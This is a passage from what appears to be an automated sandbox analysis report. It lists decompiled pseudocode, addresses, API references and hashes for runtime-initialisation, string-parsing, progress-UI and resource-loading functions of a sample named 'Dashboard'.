                                                                                                                    				 *0x101a9dc =  *_adjust_fdiv;
                                                                                                                    				E01008A25();
                                                                                                                    				_t18 = E01008BBD();
                                                                                                                    				if( *0x101a2c8 == 0) {
                                                                                                                    					__setusermatherr(E01008BBD);
                                                                                                                    				}
                                                                                                                    				E01008B8F(_t18);
                                                                                                                    				if( *0x101a2c4 == 0xffffffff) {
                                                                                                                    					__imp___configthreadlocale(0xffffffff);
                                                                                                                    				}
                                                                                                                    				return 0;
                                                                                                                    			}














                                                                                                                    0x01008541
                                                                                                                    0x01008547
                                                                                                                    0x0100854c
                                                                                                                    0x01008556
                                                                                                                    0x00000000
                                                                                                                    0x01008558
                                                                                                                    0x01008558
                                                                                                                    0x01008558
                                                                                                                    0x0100855f
                                                                                                                    0x01008565
                                                                                                                    0x01008582
                                                                                                                    0x01008589
                                                                                                                    0x00000000
                                                                                                                    0x0100858b
                                                                                                                    0x0100858b
                                                                                                                    0x0100858d
                                                                                                                    0x00000000
                                                                                                                    0x0100858d
                                                                                                                    0x01008567
                                                                                                                    0x01008567
                                                                                                                    0x0100856d
                                                                                                                    0x00000000
                                                                                                                    0x0100856f
                                                                                                                    0x0100856f
                                                                                                                    0x01008576
                                                                                                                    0x00000000
                                                                                                                    0x01008578
                                                                                                                    0x01008578
                                                                                                                    0x0100857a
                                                                                                                    0x01008593
                                                                                                                    0x01008593
                                                                                                                    0x01008593
                                                                                                                    0x01008596
                                                                                                                    0x01008596
                                                                                                                    0x01008576
                                                                                                                    0x0100856d
                                                                                                                    0x01008565
                                                                                                                    0x01008543
                                                                                                                    0x01008543
                                                                                                                    0x01008543
                                                                                                                    0x01008543
                                                                                                                    0x0100859a
                                                                                                                    0x0100859f
                                                                                                                    0x010085a7
                                                                                                                    0x010085af
                                                                                                                    0x010085b4
                                                                                                                    0x010085b9
                                                                                                                    0x010085bf
                                                                                                                    0x010085c5
                                                                                                                    0x010085c7
                                                                                                                    0x010085cd
                                                                                                                    0x010085d3
                                                                                                                    0x010085dc
                                                                                                                    0x010085e1
                                                                                                                    0x010085e6
                                                                                                                    0x010085f2
                                                                                                                    0x010085f9
                                                                                                                    0x010085ff
                                                                                                                    0x01008600
                                                                                                                    0x0100860c
                                                                                                                    0x01008610
                                                                                                                    0x01008616
                                                                                                                    0x01008619

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Initialize__p__commode__p__fmode__set_app_type__setdefaultprecision__setusermatherr_configthreadlocale_encode_pointer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2053481123-0
                                                                                                                    • Opcode ID: a64e5e51e68daed2df3a5083e8c40796ea4e3333eb65bcf129c351e50eebb4d4
                                                                                                                    • Instruction ID: df229489038c4b23ceb219302f4a03fdef434e820d14513628d8968e227b3bf0
                                                                                                                    • Opcode Fuzzy Hash: a64e5e51e68daed2df3a5083e8c40796ea4e3333eb65bcf129c351e50eebb4d4
                                                                                                                    • Instruction Fuzzy Hash: 6C21DE74A05241CFEB6B9F68E44C6A837A0FB09362F15856AF1D5872D9DB7E8484CB01
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 78%
                                                                                                                    			E0100EA68(void* __ebx, WCHAR** __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                    				WCHAR* _t30;
                                                                                                                    				WCHAR* _t31;
                                                                                                                    				WCHAR* _t32;
                                                                                                                    				WCHAR* _t33;
                                                                                                                    				signed int _t35;
                                                                                                                    				WCHAR* _t39;
                                                                                                                    				WCHAR* _t40;
                                                                                                                    				WCHAR* _t41;
                                                                                                                    				signed int* _t44;
                                                                                                                    				signed int _t47;
                                                                                                                    				WCHAR* _t53;
                                                                                                                    				WCHAR** _t55;
                                                                                                                    				void* _t56;
                                                                                                                    				void* _t57;
                                                                                                                    
                                                                                                                    				_push(0x58);
                                                                                                                    				E01008882(E01015FE0, __ebx, __edi, __esi);
                                                                                                                    				_t53 =  *(_t56 + 8);
                                                                                                                    				_t44 =  *(_t56 + 0xc);
                                                                                                                    				_t55 = __ecx;
                                                                                                                    				 *(_t56 - 0x64) = _t44;
                                                                                                                    				if(_t53 != 0 && _t44 != 0) {
                                                                                                                    					 *_t44 =  *_t44 & 0x00000000;
                                                                                                                    					E0100E126(_t56 - 0x60, lstrlenW(_t53) + _t25);
                                                                                                                    					_t47 = 0;
                                                                                                                    					 *((intOrPtr*)(_t56 - 4)) = 0;
                                                                                                                    					if( *(_t56 - 0x58) != 0) {
                                                                                                                    						 *_t55 = _t53;
                                                                                                                    						__eflags =  *_t53;
                                                                                                                    						 *((intOrPtr*)(_t56 - 0x54)) = 0;
                                                                                                                    						if( *_t53 == 0) {
                                                                                                                    							L18:
                                                                                                                    							 *(_t56 - 0x58) = _t47;
                                                                                                                    							 *_t44 =  *(_t56 - 0x58);
                                                                                                                    						} else {
                                                                                                                    							_t44 = CharNextW;
                                                                                                                    							do {
                                                                                                                    								_t30 =  *_t55;
                                                                                                                    								__eflags =  *_t30 - 0x25;
                                                                                                                    								if( *_t30 != 0x25) {
                                                                                                                    									L15:
                                                                                                                    									_t31 = E0100E16F(_t56 - 0x60, _t30, 1);
                                                                                                                    									__eflags = _t31;
                                                                                                                    									if(_t31 == 0) {
                                                                                                                    										goto L22;
                                                                                                                    									} else {
                                                                                                                    										goto L16;
                                                                                                                    									}
                                                                                                                    								} else {
                                                                                                                    									_t30 = CharNextW(_t30);
                                                                                                                    									 *_t55 = _t30;
                                                                                                                    									__eflags =  *_t30 - 0x25;
                                                                                                                    									if( *_t30 == 0x25) {
                                                                                                                    										goto L15;
                                                                                                                    									} else {
                                                                                                                    										_t33 = E0100E313(_t30, 0x25);
                                                                                                                    										_t53 = _t33;
                                                                                                                    										__eflags = _t53;
                                                                                                                    										if(_t53 == 0) {
                                                                                                                    											L20:
                                                                                                                    											 *((intOrPtr*)(_t56 - 0x54)) = 0x80020009;
                                                                                                                    										} else {
                                                                                                                    											_t49 =  *_t55;
                                                                                                                    											_t35 = _t33 -  *_t55 >> 1;
                                                                                                                    											__eflags = _t35 - 0x1f;
                                                                                                                    											if(_t35 > 0x1f) {
                                                                                                                    												 *((intOrPtr*)(_t56 - 0x54)) = 0x80004005;
                                                                                                                    											} else {
                                                                                                                    												E0100DF74(_t56 - 0x50, _t56 - 0x50, 0x20, _t49, _t35);
                                                                                                                    												_t57 = _t57 + 0x10;
                                                                                                                    												_t39 = E0100EA33(_t55[1], _t56 - 0x50);
                                                                                                                    												__eflags = _t39;
                                                                                                                    												if(__eflags == 0) {
                                                                                                                    													goto L20;
                                                                                                                    												} else {
                                                                                                                    													_push(_t39);
                                                                                                                    													_t40 = E0100E7FE(_t44, _t56 - 0x60, _t53, _t55, __eflags);
                                                                                                                    													__eflags = _t40;
                                                                                                                    													if(_t40 == 0) {
                                                                                                                    														L22:
                                                                                                                    														 *((intOrPtr*)(_t56 - 0x54)) = 0x8007000e;
                                                                                                                    													} else {
                                                                                                                    														__eflags =  *_t55 - _t53;
                                                                                                                    														if( *_t55 != _t53) {
                                                                                                                    															do {
                                                                                                                    																_t41 = CharNextW( *_t55);
                                                                                                                    																__eflags = _t41 - _t53;
                                                                                                                    																 *_t55 = _t41;
                                                                                                                    															} while (_t41 != _t53);
                                                                                                                    														}
                                                                                                                    														goto L16;
                                                                                                                    													}
                                                                                                                    												}
                                                                                                                    											}
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    								goto L19;
                                                                                                                    								L16:
                                                                                                                    								_t32 = CharNextW( *_t55);
                                                                                                                    								 *_t55 = _t32;
                                                                                                                    								__eflags =  *_t32;
                                                                                                                    							} while ( *_t32 != 0);
                                                                                                                    							_t44 =  *(_t56 - 0x64);
                                                                                                                    							_t47 = 0;
                                                                                                                    							__eflags = 0;
                                                                                                                    							goto L18;
                                                                                                                    						}
                                                                                                                    						L19:
                                                                                                                    						__imp__CoTaskMemFree( *(_t56 - 0x58));
                                                                                                                    					} else {
                                                                                                                    						__imp__CoTaskMemFree(0);
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    				return E01008914(_t44, _t53, _t55);
                                                                                                                    			}

















                                                                                                                    0x0100ea68
                                                                                                                    0x0100ea6f
                                                                                                                    0x0100ea74
                                                                                                                    0x0100ea79
                                                                                                                    0x0100ea7c
                                                                                                                    0x0100ea7e
                                                                                                                    0x0100ea81
                                                                                                                    0x0100ea8f
                                                                                                                    0x0100ea9f
                                                                                                                    0x0100eaa4
                                                                                                                    0x0100eaa9
                                                                                                                    0x0100eaac
                                                                                                                    0x0100eabf
                                                                                                                    0x0100eac1
                                                                                                                    0x0100eac4
                                                                                                                    0x0100eac7
                                                                                                                    0x0100eb68
                                                                                                                    0x0100eb6b
                                                                                                                    0x0100eb6e
                                                                                                                    0x0100eacd
                                                                                                                    0x0100eacd
                                                                                                                    0x0100ead3
                                                                                                                    0x0100ead3
                                                                                                                    0x0100ead5
                                                                                                                    0x0100ead9
                                                                                                                    0x0100eb44
                                                                                                                    0x0100eb4a
                                                                                                                    0x0100eb4f
                                                                                                                    0x0100eb51
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100eadb
                                                                                                                    0x0100eadc
                                                                                                                    0x0100eade
                                                                                                                    0x0100eae0
                                                                                                                    0x0100eae4
                                                                                                                    0x00000000
                                                                                                                    0x0100eae6
                                                                                                                    0x0100eae9
                                                                                                                    0x0100eaee
                                                                                                                    0x0100eaf0
                                                                                                                    0x0100eaf2
                                                                                                                    0x0100eb7e
                                                                                                                    0x0100eb7e
                                                                                                                    0x0100eaf8
                                                                                                                    0x0100eaf8
                                                                                                                    0x0100eafc
                                                                                                                    0x0100eafe
                                                                                                                    0x0100eb01
                                                                                                                    0x0100eb87
                                                                                                                    0x0100eb07
                                                                                                                    0x0100eb0f
                                                                                                                    0x0100eb17
                                                                                                                    0x0100eb1e
                                                                                                                    0x0100eb23
                                                                                                                    0x0100eb25
                                                                                                                    0x00000000
                                                                                                                    0x0100eb27
                                                                                                                    0x0100eb27
                                                                                                                    0x0100eb2b
                                                                                                                    0x0100eb30
                                                                                                                    0x0100eb32
                                                                                                                    0x0100eb90
                                                                                                                    0x0100eb90
                                                                                                                    0x0100eb34
                                                                                                                    0x0100eb34
                                                                                                                    0x0100eb36
                                                                                                                    0x0100eb38
                                                                                                                    0x0100eb3a
                                                                                                                    0x0100eb3c
                                                                                                                    0x0100eb3e
                                                                                                                    0x0100eb3e
                                                                                                                    0x0100eb42
                                                                                                                    0x00000000
                                                                                                                    0x0100eb36
                                                                                                                    0x0100eb32
                                                                                                                    0x0100eb25
                                                                                                                    0x0100eb01
                                                                                                                    0x0100eaf2
                                                                                                                    0x0100eae4
                                                                                                                    0x00000000
                                                                                                                    0x0100eb53
                                                                                                                    0x0100eb55
                                                                                                                    0x0100eb57
                                                                                                                    0x0100eb59
                                                                                                                    0x0100eb59
                                                                                                                    0x0100eb63
                                                                                                                    0x0100eb66
                                                                                                                    0x0100eb66
                                                                                                                    0x00000000
                                                                                                                    0x0100eb66
                                                                                                                    0x0100eb70
                                                                                                                    0x0100eb73
                                                                                                                    0x0100eaae
                                                                                                                    0x0100eaaf
                                                                                                                    0x0100eab5
                                                                                                                    0x0100eaac
                                                                                                                    0x0100eba3

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 0100EA6F
                                                                                                                    • lstrlenW.KERNEL32(?,00000058,0100FD43,?,?), ref: 0100EA93
                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 0100EAAF
                                                                                                                    • CharNextW.USER32(00000000), ref: 0100EADC
                                                                                                                    • CharNextW.USER32(?,00000000), ref: 0100EB3A
                                                                                                                    • CharNextW.USER32(?,?,00000000), ref: 0100EB55
                                                                                                                    • CoTaskMemFree.OLE32(?), ref: 0100EB73
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CharNext$FreeTask$H_prolog3_lstrlen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 416358153-0
                                                                                                                    • Opcode ID: 0b2cc8b0ca95ee9ccc828c56ca36c7ebe43c033411923d3d826cb913160ee5f3
                                                                                                                    • Instruction ID: 77407f147547ef54938decaa461d41fac9caa3732f36381b43ef8ca3cf38b2ec
                                                                                                                    • Opcode Fuzzy Hash: 0b2cc8b0ca95ee9ccc828c56ca36c7ebe43c033411923d3d826cb913160ee5f3
                                                                                                                    • Instruction Fuzzy Hash: BD313E709046059BFB26AFA8CC44AAEBBF4FF54300F14485DE5C6BB2D5DB7499808B64
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 20%
                                                                                                                    			E0100DA31(void* __ebx, intOrPtr __ecx, void* __edx, void* __esi, intOrPtr _a4) {
                                                                                                                    				signed int _v8;
                                                                                                                    				char _v528;
                                                                                                                    				char _v1048;
                                                                                                                    				intOrPtr _v1052;
                                                                                                                    				void* __edi;
                                                                                                                    				signed int _t20;
                                                                                                                    				void* _t26;
                                                                                                                    				void* _t31;
                                                                                                                    				void* _t40;
                                                                                                                    				intOrPtr* _t44;
                                                                                                                    				void* _t53;
                                                                                                                    				signed int _t58;
                                                                                                                    
                                                                                                                    				_t56 = __esi;
                                                                                                                    				_t53 = __edx;
                                                                                                                    				_t43 = __ebx;
                                                                                                                    				_t20 =  *0x101a2b4; // 0xcf26dccf
                                                                                                                    				_v8 = _t20 ^ _t58;
                                                                                                                    				_v1052 = __ecx;
                                                                                                                    				__imp__?GetElement@NativeHWNDHost@DirectUI@@QAEPAVElement@2@XZ();
                                                                                                                    				if(__ecx == 0) {
                                                                                                                    					L2:
                                                                                                                    					_t54 = 0x8000ffff;
                                                                                                                    					L11:
                                                                                                                    					return E010087FB(_t54, _t43, _v8 ^ _t58, _t53, _t54, _t56);
                                                                                                                    				}
                                                                                                                    				__imp__?StrToID@DirectUI@@YGGPB_W@Z(__ecx);
                                                                                                                    				if(E0100C421(__ecx, __ecx, L"idProgress") != 0) {
                                                                                                                    					_t26 = E0100CA7A(_t25, _t25, _a4);
                                                                                                                    					_t54 = _t26;
                                                                                                                    					if(_t26 < 0) {
                                                                                                                    						goto L11;
                                                                                                                    					}
                                                                                                                    					_push(__ebx);
                                                                                                                    					_t44 = __imp__?RMLoadCompoundString@@YGIIPA_WIKPB_W@Z;
                                                                                                                    					_push(__esi);
                                                                                                                    					_push(0);
                                                                                                                    					_push(0xf);
                                                                                                                    					_push(0x104);
                                                                                                                    					_push( &_v1048);
                                                                                                                    					_push(0x219);
                                                                                                                    					if( *_t44() == 0) {
                                                                                                                    						L7:
                                                                                                                    						_t54 = 0x8000ffff;
                                                                                                                    						L10:
                                                                                                                    						_pop(_t56);
                                                                                                                    						_pop(_t43);
                                                                                                                    						goto L11;
                                                                                                                    					}
                                                                                                                    					_t31 = E0100D225( &_v528, 0x104,  &_v1048, _a4);
                                                                                                                    					_t54 = _t31;
                                                                                                                    					if(_t31 < 0) {
                                                                                                                    						goto L10;
                                                                                                                    					}
                                                                                                                    					E0100CF7E( &_v528, _v1052, L"idProgressText",  &_v528);
                                                                                                                    					E0100CFBA( &_v528, _v1052, L"idProgressText",  &_v528);
                                                                                                                    					_push(0);
                                                                                                                    					_push(0xf);
                                                                                                                    					_push(0x104);
                                                                                                                    					_push( &_v1048);
                                                                                                                    					_push(0x1fc);
                                                                                                                    					if( *_t44() != 0) {
                                                                                                                    						_t40 = E0100D225( &_v528, 0x104,  &_v1048, _a4);
                                                                                                                    						_t54 = _t40;
                                                                                                                    						if(_t40 >= 0) {
                                                                                                                    							E0100CFBA( &_v528, _v1052, L"idProgress",  &_v528);
                                                                                                                    						}
                                                                                                                    						goto L10;
                                                                                                                    					}
                                                                                                                    					goto L7;
                                                                                                                    				}
                                                                                                                    				goto L2;
                                                                                                                    			}















                                                                                                                    0x0100da31
                                                                                                                    0x0100da31
                                                                                                                    0x0100da31
                                                                                                                    0x0100da3c
                                                                                                                    0x0100da43
                                                                                                                    0x0100da4c
                                                                                                                    0x0100da52
                                                                                                                    0x0100da5a
                                                                                                                    0x0100da72
                                                                                                                    0x0100da72
                                                                                                                    0x0100db5a
                                                                                                                    0x0100db68
                                                                                                                    0x0100db68
                                                                                                                    0x0100da62
                                                                                                                    0x0100da70
                                                                                                                    0x0100da81
                                                                                                                    0x0100da86
                                                                                                                    0x0100da8a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100da90
                                                                                                                    0x0100da91
                                                                                                                    0x0100da97
                                                                                                                    0x0100da98
                                                                                                                    0x0100da9a
                                                                                                                    0x0100daa1
                                                                                                                    0x0100daa8
                                                                                                                    0x0100daa9
                                                                                                                    0x0100dab2
                                                                                                                    0x0100db1a
                                                                                                                    0x0100db1a
                                                                                                                    0x0100db58
                                                                                                                    0x0100db58
                                                                                                                    0x0100db59
                                                                                                                    0x00000000
                                                                                                                    0x0100db59
                                                                                                                    0x0100dac6
                                                                                                                    0x0100dacb
                                                                                                                    0x0100dad2
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100daeb
                                                                                                                    0x0100dafe
                                                                                                                    0x0100db03
                                                                                                                    0x0100db05
                                                                                                                    0x0100db07
                                                                                                                    0x0100db0e
                                                                                                                    0x0100db0f
                                                                                                                    0x0100db18
                                                                                                                    0x0100db33
                                                                                                                    0x0100db38
                                                                                                                    0x0100db3f
                                                                                                                    0x0100db53
                                                                                                                    0x0100db53
                                                                                                                    0x00000000
                                                                                                                    0x0100db3f
                                                                                                                    0x00000000
                                                                                                                    0x0100db18
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • ?GetElement@NativeHWNDHost@DirectUI@@QAEPAVElement@2@XZ.UXCORE ref: 0100DA52
                                                                                                                    • ?StrToID@DirectUI@@YGGPB_W@Z.UXCORE(idProgress,00000000), ref: 0100DA62
                                                                                                                      • Part of subcall function 0100C421: ?FindDescendent@Element@DirectUI@@QAEPAV12@G@Z.UXCORE(?), ref: 0100C434
                                                                                                                    • ?RMLoadCompoundString@@YGIIPA_WIKPB_W@Z.UXCORE(00000219,?,00000104,0000000F,00000000), ref: 0100DAAE
                                                                                                                    • ?RMLoadCompoundString@@YGIIPA_WIKPB_W@Z.UXCORE(000001FC,?,00000104,0000000F,00000000), ref: 0100DB14
                                                                                                                      • Part of subcall function 0100D225: _vsnwprintf.MSVCR80 ref: 0100D258
                                                                                                                      • Part of subcall function 0100CFBA: ?GetElement@NativeHWNDHost@DirectUI@@QAEPAVElement@2@XZ.UXCORE ref: 0100CFC2
                                                                                                                      • Part of subcall function 0100CFBA: ?StrToID@DirectUI@@YGGPB_W@Z.UXCORE(?,00000000), ref: 0100CFCC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Direct$Element@$CompoundElement@2@Host@LoadNativeString@@$Descendent@FindV12@_vsnwprintf
                                                                                                                    • String ID: idProgress$idProgressText
                                                                                                                    • API String ID: 1622879431-3864566807
                                                                                                                    • Opcode ID: 5ca6dc815ab63f4628eb3ca0176669c1f24df00391b79aee8dd3d173367796a8
                                                                                                                    • Instruction ID: 9248abb560470032c29b498042893fc5111e7cdd0c223232870edfb5f12c8365
                                                                                                                    • Opcode Fuzzy Hash: 5ca6dc815ab63f4628eb3ca0176669c1f24df00391b79aee8dd3d173367796a8
                                                                                                                    • Instruction Fuzzy Hash: B73192B560021EABFB229BD4DC44FFA77BDAB45310F1041B5AA49E7181EA34DE858B70
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 85%
                                                                                                                    			E0100FE79(void* __ebx, int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                    				char* _t44;
                                                                                                                    				void* _t45;
                                                                                                                    				void* _t52;
                                                                                                                    				signed int _t55;
                                                                                                                    				short* _t59;
                                                                                                                    				void* _t67;
                                                                                                                    				void* _t72;
                                                                                                                    				void* _t73;
                                                                                                                    
                                                                                                                    				_t67 = __edx;
                                                                                                                    				E010088BD(E0101612E, __ebx, __edi, __esi);
                                                                                                                    				_t69 = __ecx;
                                                                                                                    				 *(_t73 - 0x41c) =  *(_t73 + 0xc);
                                                                                                                    				 *(_t73 - 0x420) =  *(_t73 + 0x10);
                                                                                                                    				 *0x101a294(0x424);
                                                                                                                    				 *((intOrPtr*)(_t73 - 0x424)) = 0;
                                                                                                                    				 *((intOrPtr*)(_t73 - 4)) = 0;
                                                                                                                    				 *((intOrPtr*)(_t73 - 0x42c)) = __ecx;
                                                                                                                    				 *((intOrPtr*)(_t73 - 0x430)) = 0;
                                                                                                                    				 *(_t73 - 0x418) = 0;
                                                                                                                    				 *((char*)(_t73 - 4)) = 1;
                                                                                                                    				_t59 = LoadLibraryExW( *(_t73 + 8), 0, 2);
                                                                                                                    				 *(_t73 - 0x428) = _t59;
                                                                                                                    				if(_t59 != 0) {
                                                                                                                    					_t69 = FindResourceW(_t59,  *(_t73 - 0x41c),  *(_t73 - 0x420));
                                                                                                                    					__eflags = _t69;
                                                                                                                    					if(_t69 != 0) {
                                                                                                                    						_t44 = LoadResource(_t59, _t69);
                                                                                                                    						__eflags = _t44;
                                                                                                                    						 *(_t73 - 0x420) = _t44;
                                                                                                                    						if(_t44 == 0) {
                                                                                                                    							goto L3;
                                                                                                                    						}
                                                                                                                    						_t69 = SizeofResource(_t59, _t69);
                                                                                                                    						_t16 = _t69 + 1; // 0x1
                                                                                                                    						_t52 = _t16;
                                                                                                                    						__eflags = _t52 - _t69;
                                                                                                                    						 *(_t73 - 0x41c) = _t69;
                                                                                                                    						if(_t52 >= _t69) {
                                                                                                                    							 *((char*)(_t73 - 4)) = 2;
                                                                                                                    							E0100EC09(_t73 - 0x418, _t52);
                                                                                                                    							 *((intOrPtr*)(_t73 - 4)) = 1;
                                                                                                                    							_t59 =  *(_t73 - 0x418);
                                                                                                                    							__eflags = _t59;
                                                                                                                    							if(_t59 != 0) {
                                                                                                                    								_t55 = MultiByteToWideChar( *0x101a294(), 0,  *(_t73 - 0x420), _t69, _t59, _t69);
                                                                                                                    								__eflags = _t55;
                                                                                                                    								if(__eflags == 0) {
                                                                                                                    									goto L3;
                                                                                                                    								}
                                                                                                                    								( *(_t73 - 0x418))[_t55] = 0;
                                                                                                                    								_t45 = E0100FD0B(_t73 - 0x430, _t67, __eflags,  *(_t73 - 0x418),  *((intOrPtr*)(_t73 + 0x14)));
                                                                                                                    								L15:
                                                                                                                    								_t72 = _t45;
                                                                                                                    								L16:
                                                                                                                    								FreeLibrary( *(_t73 - 0x428));
                                                                                                                    								L17:
                                                                                                                    								_t47 = _t73 - 0x414;
                                                                                                                    								if( *(_t73 - 0x418) != _t73 - 0x414) {
                                                                                                                    									_t47 = E0100E678(_t73 - 0x418);
                                                                                                                    								}
                                                                                                                    								L9:
                                                                                                                    								E0100E587(_t47, _t73 - 0x424);
                                                                                                                    								return E01008928(_t59, _t69, _t72);
                                                                                                                    							}
                                                                                                                    							_t72 = 0x8007000e;
                                                                                                                    							goto L16;
                                                                                                                    						}
                                                                                                                    						_t47 = _t73 - 0x414;
                                                                                                                    						__eflags =  *(_t73 - 0x418) - _t73 - 0x414;
                                                                                                                    						if( *(_t73 - 0x418) != _t73 - 0x414) {
                                                                                                                    							_t47 = E0100E678(_t73 - 0x418);
                                                                                                                    						}
                                                                                                                    						_t72 = 0x8007000e;
                                                                                                                    						goto L9;
                                                                                                                    					}
                                                                                                                    					L3:
                                                                                                                    					_t45 = E0100CC3F();
                                                                                                                    					goto L15;
                                                                                                                    				}
                                                                                                                    				_t72 = E0100CC3F();
                                                                                                                    				goto L17;
                                                                                                                    			}











                                                                                                                    0x0100fe79
                                                                                                                    0x0100fe83
                                                                                                                    0x0100fe88
                                                                                                                    0x0100fe90
                                                                                                                    0x0100fe99
                                                                                                                    0x0100fe9f
                                                                                                                    0x0100fea7
                                                                                                                    0x0100fead
                                                                                                                    0x0100feb0
                                                                                                                    0x0100feb6
                                                                                                                    0x0100febc
                                                                                                                    0x0100fec6
                                                                                                                    0x0100fed0
                                                                                                                    0x0100fed4
                                                                                                                    0x0100feda
                                                                                                                    0x0100fefb
                                                                                                                    0x0100fefd
                                                                                                                    0x0100feff
                                                                                                                    0x0100ff0d
                                                                                                                    0x0100ff13
                                                                                                                    0x0100ff15
                                                                                                                    0x0100ff1b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100ff25
                                                                                                                    0x0100ff27
                                                                                                                    0x0100ff27
                                                                                                                    0x0100ff2a
                                                                                                                    0x0100ff2c
                                                                                                                    0x0100ff32
                                                                                                                    0x0100ff6e
                                                                                                                    0x0100ff72
                                                                                                                    0x0100ff77
                                                                                                                    0x0100ff8e
                                                                                                                    0x0100ff94
                                                                                                                    0x0100ff96
                                                                                                                    0x0100ffb0
                                                                                                                    0x0100ffb6
                                                                                                                    0x0100ffb8
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100ffc7
                                                                                                                    0x0100ffd7
                                                                                                                    0x0100ffdc
                                                                                                                    0x0100ffdc
                                                                                                                    0x0100ffde
                                                                                                                    0x0100ffe4
                                                                                                                    0x0100ffea
                                                                                                                    0x0100ffea
                                                                                                                    0x0100fff6
                                                                                                                    0x01010002
                                                                                                                    0x01010002
                                                                                                                    0x0100ff52
                                                                                                                    0x0100ff58
                                                                                                                    0x0100ff64
                                                                                                                    0x0100ff64
                                                                                                                    0x0100ff98
                                                                                                                    0x00000000
                                                                                                                    0x0100ff98
                                                                                                                    0x0100ff34
                                                                                                                    0x0100ff3a
                                                                                                                    0x0100ff40
                                                                                                                    0x0100ff48
                                                                                                                    0x0100ff48
                                                                                                                    0x0100ff4d
                                                                                                                    0x00000000
                                                                                                                    0x0100ff4d
                                                                                                                    0x0100ff01
                                                                                                                    0x0100ff01
                                                                                                                    0x00000000
                                                                                                                    0x0100ff01
                                                                                                                    0x0100fee1
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3_catch_GS.LIBCMT ref: 0100FE83
                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002), ref: 0100FECA
                                                                                                                    • FindResourceW.KERNEL32(00000000,?,?), ref: 0100FEF5
                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 0100FFE4
                                                                                                                      • Part of subcall function 0100CC3F: GetLastError.KERNEL32(01006B35,?,01001808,?,?), ref: 0100CC3F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$ErrorFindFreeH_prolog3_catch_LastLoadResource
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 724505223-0
                                                                                                                    • Opcode ID: 2a255d419a8cd9764f616e2a3f2f23f461e79bb551b7f378d87156cb290651a7
                                                                                                                    • Instruction ID: f8d4d4d37ea8e13076e32b856f19b572d4baa903ea9adfc10e0173d023539797
                                                                                                                    • Opcode Fuzzy Hash: 2a255d419a8cd9764f616e2a3f2f23f461e79bb551b7f378d87156cb290651a7
